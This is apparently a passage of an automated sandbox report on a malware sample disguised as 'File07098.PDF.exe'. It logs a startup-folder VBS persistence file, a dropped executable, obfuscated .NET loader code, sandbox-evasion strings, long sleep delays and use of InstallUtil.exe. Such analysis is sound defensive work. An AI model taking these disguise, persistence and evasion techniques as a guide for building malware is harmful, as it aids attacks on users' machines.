                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
                Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                Source: C:\Users\user\AppData\Roaming\Current.exe, Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\File07098.PDF.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: File07098.PDF.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: File07098.PDF.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.cs, .Net Code: Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777252)),Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777284))})
                Source: File07098.PDF.exe, InterceptorDefinitionSpec.cs, .Net Code: PrintBridge System.Reflection.Assembly.Load(byte[])
                Source: Current.exe.0.dr, InterceptorDefinitionSpec.cs, .Net Code: PrintBridge System.Reflection.Assembly.Load(byte[])
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, XmlSerializationHelper.cs, .Net Code: ReadObjectProperties
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, XmlSerializationHelper.cs, .Net Code: ReadObjectProperties
                Source: Yara match, File source: 0.2.File07098.PDF.exe.5fc0000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2097674143.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_06613181 push ebx; retf 2_2_06613182
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 6_2_05F52E78 push esp; iretd 6_2_05F52E79
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, AssemblyLoader.cs, High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'rDcdLJHFg3BL3vDexCB'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, oOadFQQ6QrWpyWxPsKq.cs, High entropy of concatenated method names: 'zTwQYmyxA1', 'P92QGFRcVc', 'xfs73kVC4iEbIGDsBJ3', 'GWa4TyVRaFumfratOrb', 'TMh75cVV9lOfi1oXLyo', 'oKd8erVH5M54PPrDar9', 'o8Bro5ViB6duugJnOp9', 'ISHJl1VMY71rTE5lQao', 'QuZ5tmVuRZICcDyZnPu', 'Ub6yMJVZ2u8NEulaiFn'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, BRDXFsKF7W5IlA0pYyJ.cs, High entropy of concatenated method names: 'tD6KkRErVl', 'IrkKbBIpqA', 'go4Kf3aygw', 'KkcK5DbCWM', 'VY7K6xKRqZ', 'LH8KwTFewK', 'taFKYMlM4V', 'iZmKGQQ39k', 'UP3KxT4oD0', 'l71KgOIsSU'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, LseevIOCAj1J5VWSK8t.cs, High entropy of concatenated method names: 'FIUOL0kixQ', 'k5bO9WBM7E', 'EmGOm8QCxZ', 'CIQOJ5GBCN', 'uFlO193kTf', 'HCpOy28sdT', 'DicOovOIhK', 'DHgO8Jy4fs', 'zhvOTwgpnc', 'kHwOaRCtqC'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.cs, High entropy of concatenated method names: 'YIbuO4HqhyaqydCUPUY', 'ICkMU5HcuGlY80FDaWb', 'C9rOOxjv9Y', 'pBuPSvHJ2l4gYyPYBCr', 'tJCrc9H1lHeaSl5Ddt3', 'D7MfKfHyP99AlFtZgTy', 'tq36RxHoWa7DXmJiSJB', 'WWhnotH8ssQAqtXhJrV', 'OP2IR0HT8ekDt6In0Ot', 'sG0QANHa0k95Tesu0Ty'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, C21M3M4JAESaIT7jM5.cs, High entropy of concatenated method names: 'MridaXYDv', 'p9TpkouoO', 'TQpIqAHc7', 'PGOlO2r7b', 'zMV8E93F5NssYHB0XG1', 'bVLbgq3Qsj6u74tlcQ4', 'U1BZVA3kN9IAnN45hPI'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, JaAoqwOzUF4TLlhYSpQ.cs, High entropy of concatenated method names: 'SEmwdCdZdI', 'uLFwpNI6Xl', 'k86wlng5vZ', 'zgvwIs5wt9', 'lPEwEDyigC', 'iIAwsQbhMW', 'kkHwvG9mok', 'xKsbNugmkB', 'D1kw02l05h', 'LjawABTmmn'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, tyI0o3tAWRFSOBHUPbR.cs, High entropy of concatenated method names: 'kUntnCyT6H', 'Ex9tjREZ2v', 'esSt39uCpL', 'UMstCd6DWS', 'BrktRduUjf', 'UZHByFC6vaxdEocVwnT', 'AMVo3lCwWx8Zin0Gyvu', 'fejp0VCYTQnmiS5Gwmm', 'p2qdRPCGRcpVjX2AaX4', 'gqXgxSCx7W9mqrgLG80'
                Source: C:\Users\user\Desktop\File07098.PDF.exe, File created: C:\Users\user\AppData\Roaming\Current.exe

                Boot Survival

                Source: C:\Users\user\Desktop\File07098.PDF.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

                Hooking and other Techniques for Hiding and Protection

                Source: Possible double extension: pdf.exe, Static PE information: File07098.PDF.exe
                Source: C:\Users\user\AppData\Roaming\Current.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\Current.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\File07098.PDF.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Current.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\File07098.PDF.exe Memory allocated: A40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\File07098.PDF.exe Memory allocated: 23D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\File07098.PDF.exe Memory allocated: 43D0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1230000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D10000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Current.exe Memory allocated: 28D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Current.exe Memory allocated: 2AE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Current.exe Memory allocated: 2A30000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: A60000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2470000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2380000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\File07098.PDF.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599014
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598797
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595731
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595606
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Users\user\Desktop\File07098.PDF.exe Window / User API: threadDelayed 5462
                Source: C:\Users\user\Desktop\File07098.PDF.exe Window / User API: threadDelayed 1682
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7511
                Source: C:\Users\user\AppData\Roaming\Current.exe Window / User API: threadDelayed 1659
                Source: C:\Users\user\AppData\Roaming\Current.exe Window / User API: threadDelayed 4315
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 8627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 1227
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912 Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912 Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912 Thread sleep time: -99891s >= -30000s
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 5796 Thread sleep count: 5462 > 30
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 6620 Thread sleep count: 1682 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632 Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632 Thread sleep time: -599890s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6388 Thread sleep count: 2344 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6388 Thread sleep count: 7511 > 30
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288 Thread sleep time: -22136092888451448s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288 Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3376 Thread sleep count: 1659 > 30
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288 Thread sleep time: -99874s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3376 Thread sleep count: 4315 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064 Thread sleep time: -27670116110564310s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7060 Thread sleep count: 8627 > 30
